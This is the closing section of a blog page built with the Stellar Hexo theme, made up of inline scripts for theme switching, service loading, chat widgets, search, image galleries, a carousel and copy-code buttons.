    const currentTheme = document.documentElement.getAttribute('data-theme')
    let newTheme;
    switch (currentTheme) {
      case 'light':
        newTheme = 'dark'
        break
      case 'dark':
        newTheme = 'auto'
        break
      default:
        newTheme = 'light'
    }
    applyTheme(newTheme)
    window.localStorage.setItem('Stellar.theme', newTheme)
    utils.dark.mode = newTheme === 'auto' ? (window.matchMedia("(prefers-color-scheme: dark)").matches ? "dark" : "light") : newTheme;
    utils.dark.method.toggle.start();

    const messages = {
      light: `Switched to Light Mode`,
      dark: `Switched to Dark Mode`,
      auto: `Switched to Auto Mode`,
    }
    hud?.toast?.(messages[newTheme])
  }

  (() => {
    // Apply user's preferred theme, if any.
    const theme = window.localStorage.getItem('Stellar.theme')
    if (theme !== null) {
      applyTheme(theme)
    } else {
      utils.dark.mode = window.matchMedia("(prefers-color-scheme: dark)").matches ? "dark" : "light";
    }
    utils.dark.method.toggle.start();
  })()
</script>


<!-- optional -->



<script defer>
  window.addEventListener('DOMContentLoaded', (event) => {
    ctx.services = Object.assign({}, JSON.parse(`{"mdrender":{"js":"/js/services/mdrender.js"},"siteinfo":{"js":"/js/services/siteinfo.js","api":null},"ghinfo":{"js":"/js/services/ghinfo.js"},"rating":{"js":"/js/services/rating.js","api":"https://star-vote.xaox.cc/api/rating"},"vote":{"js":"/js/services/vote.js","api":"https://star-vote.xaox.cc/api/vote"},"sites":{"js":"/js/services/sites.js"},"friends":{"js":"/js/services/friends.js"},"friends_and_posts":{"js":"/js/services/friends_and_posts.js"},"timeline":{"js":"/js/services/timeline.js"},"fcircle":{"js":"/js/services/fcircle.js"},"weibo":{"js":"/js/services/weibo.js"},"memos":{"js":"/js/services/memos.js"},"voice":{"js":"/js/plugins/voice.js"},"video":{"js":"/js/plugins/video.js"},"download-file":{"js":"/js/plugins/download-file.js"},"twikoo":{"js":"/js/services/twikoo_latest_comment.js"},"waline":{"js":"/js/services/waline_latest_comment.js"},"artalk":{"js":"/js/services/artalk_latest_comment.js"},"giscus":{"js":"/js/services/giscus_latest_comment.js"},"contributors":{"edit_this_page":{"_posts/":null,"wiki/stellar/":"https://github.com/xaoxuu/hexo-theme-stellar-docs/blob/main/"},"js":"/js/services/contributors.js"}}`));
    for (let id of Object.keys(ctx.services)) {
      const js = ctx.services[id].js;
      if (id == 'siteinfo') {
        ctx.cardlinks = document.querySelectorAll('a.link-card[cardlink]');
        if (ctx.cardlinks?.length > 0) {
          utils.js(js, { defer: true }).then(function () {
            setCardLink(ctx.cardlinks);
          });
        }
      } else if (id == 'voice') {
        ctx.voiceAudios = document.querySelectorAll('.voice>audio');
        if (ctx.voiceAudios?.length > 0) {
          utils.js(js, { defer: true }).then(function () {
            createVoiceDom(ctx.voiceAudios);
          });
        }
      } else if (id == 'video') {
        ctx.videos = document.querySelectorAll('.video>video');
        if (ctx.videos?.length > 0) {
          utils.js(js, { defer: true }).then(function () {
            videoEvents(ctx.videos);
          });
        }
      } else if (id == 'download-file') {
        ctx.files = document.querySelectorAll('.file');
        if (ctx.files?.length > 0) {
          utils.js(js, { defer: true }).then(function () {
            downloadFileEvent(ctx.files);
          });
        }
      } else {
        const els = document.getElementsByClassName(`ds-${id}`);
        if (els?.length > 0) {
          utils.jq(() => {
            if (id == 'timeline' || 'memos' || 'marked') {
              utils.js(deps.marked).then(function () {
                utils.js(js, { defer: true });
              });
            } else {
              utils.js(js, { defer: true });
            }
          });
        }
      }
    }

    // chat iphone time
    let phoneTimes = document.querySelectorAll('.chat .status-bar .time');

    if (phoneTimes.length > 0) {
      NowTime();
      var date = new Date();
      var sec = date.getSeconds();
      var firstAdjustInterval = setInterval(firstAdjustTime, 1000 * (60 - sec));
    }

    function firstAdjustTime() {
      NowTime();
      clearInterval(firstAdjustInterval);
      setInterval(NowTime, 1000 * 60);
    }

    function NowTime() {
      for (let i = 0; i < phoneTimes.length; ++i) {
        var timeSpan = phoneTimes[i];
        var date = new Date();
        var hour = date.getHours();
        var min = date.getMinutes();
        timeSpan.innerHTML = check(hour) + ":" + check(min);
      }
    };

    function check(val) {
      if (val < 10) {
        return ("0" + val);
      }
      return (val);
    }

    // chat quote
    const chat_quote_obverser = new IntersectionObserver((entries, observer) => {
      entries.filter((entry) => { return entry.isIntersecting }).sort((a, b) => a.intersectionRect.y !== b.intersectionRect.y ? a.intersectionRect.y - b.intersectionRect.y : a.intersectionRect.x - b.intersectionRect.x).forEach((entry, index) => {
          observer.unobserve(entry.target);
          setTimeout(() => {
            entry.target.classList.add('quote-blink');
            setTimeout(() => {
              entry.target.classList.remove('quote-blink');
            }, 1000);
          }, Math.max(100, 16) * (index + 1));
        });
    });

    var chatQuotes = document.querySelectorAll(".chat .talk .quote");
    chatQuotes.forEach((quote) => {
      quote.addEventListener('click', function () {
        var chatCellDom = document.getElementById("quote-" + quote.getAttribute("quotedCellTag"));
        if (chatCellDom) {
          var chatDiv = chatCellDom.parentElement;
          var mid = chatDiv.clientHeight / 2;
          var offsetTop = chatCellDom.offsetTop;
          if (offsetTop > mid - chatCellDom.clientHeight / 2) {
            chatDiv.scrollTo({
              top: chatCellDom.offsetTop - mid + chatCellDom.clientHeight / 2,
              behavior: "smooth"
            });
          } else {
            chatDiv.scrollTo({
              top: 0,
              behavior: "smooth"
            });
          }
          chat_quote_obverser.observe(chatCellDom);
        }
      });
    });
  });
</script>

<script>
  window.addEventListener('DOMContentLoaded', (event) => {
    ctx.search = {
      path: `/search.json`,
    }
    utils.js('/js/search/local-search.js', { defer: true });
  });
</script><script>
  window.FPConfig = {
    delay: 0,
    ignoreKeywords: [],
    maxRPS: 5,
    hoverDelay: 25
  };
</script>
<script defer src="https://gcore.jsdelivr.net/npm/flying-pages@2/flying-pages.min.js"></script><script>
  ctx.fancybox = {
    selector: `.timenode p>img`,
    css: `https://gcore.jsdelivr.net/npm/@fancyapps/ui@5.0/dist/fancybox/fancybox.css`,
    js: `https://gcore.jsdelivr.net/npm/@fancyapps/ui@5.0/dist/fancybox/fancybox.umd.js`
  };
  var selector = '[data-fancybox]:not(.error), .with-fancybox .atk-content img:not([atk-emoticon])';
  if (ctx.fancybox.selector) {
    selector += `, ${ctx.fancybox.selector}`
  }
  var needFancybox = document.querySelectorAll(selector).length !== 0;
  if (!needFancybox) {
    const memos = document.getElementsByClassName('ds-memos');
    if (memos != undefined && memos.length > 0) {
      needFancybox = true;
    }
    const fancybox = document.getElementsByClassName('with-fancybox');
    if (fancybox != undefined && fancybox.length > 0) {
      needFancybox = true;
    }
  }
  if (needFancybox) {
    utils.css(ctx.fancybox.css);
    utils.js(ctx.fancybox.js, { defer: true }).then(function () {
      Fancybox.bind(selector, {
        hideScrollbar: false,
        Thumbs: {
          autoStart: false,
        },
        caption: (fancybox, slide) => {
          return slide.triggerEl.alt || slide.triggerEl.dataset.caption || null
        }
      });
    })
  }
</script>
<script>
  window.addEventListener('DOMContentLoaded', (event) => {
    const swiper_api = document.getElementById('swiper-api');
    if (swiper_api != undefined) {
      utils.css(`https://unpkg.com/swiper@10.3/swiper-bundle.min.css`);
      utils.js(`https://unpkg.com/swiper@10.3/swiper-bundle.min.js`, { defer: true }).then(function () {
        const effect = swiper_api.getAttribute('effect') || '';
        var swiper = new Swiper('.swiper#swiper-api', {
          slidesPerView: 'auto',
          spaceBetween: 8,
          centeredSlides: true,
          effect: effect,
          rewind: true,
          pagination: {
            el: '.swiper-pagination',
            clickable: true,
          },
          navigation: {
            nextEl: '.swiper-button-next',
            prevEl: '.swiper-button-prev',
          },
        });
      })
    }
  });
</script>
<script>
  document.addEventListener('DOMContentLoaded', function () {
    window.codeElements = document.querySelectorAll('.code');
    if (window.codeElements.length > 0) {
      ctx.copycode = {
        default_text: `Copy`,
        success_text: `Copied`,
        toast: `复制成功`,
      };
      utils.js('/js/plugins/copycode.js');
    }
  });
</script>


<!-- inject -->

</div></body></html>
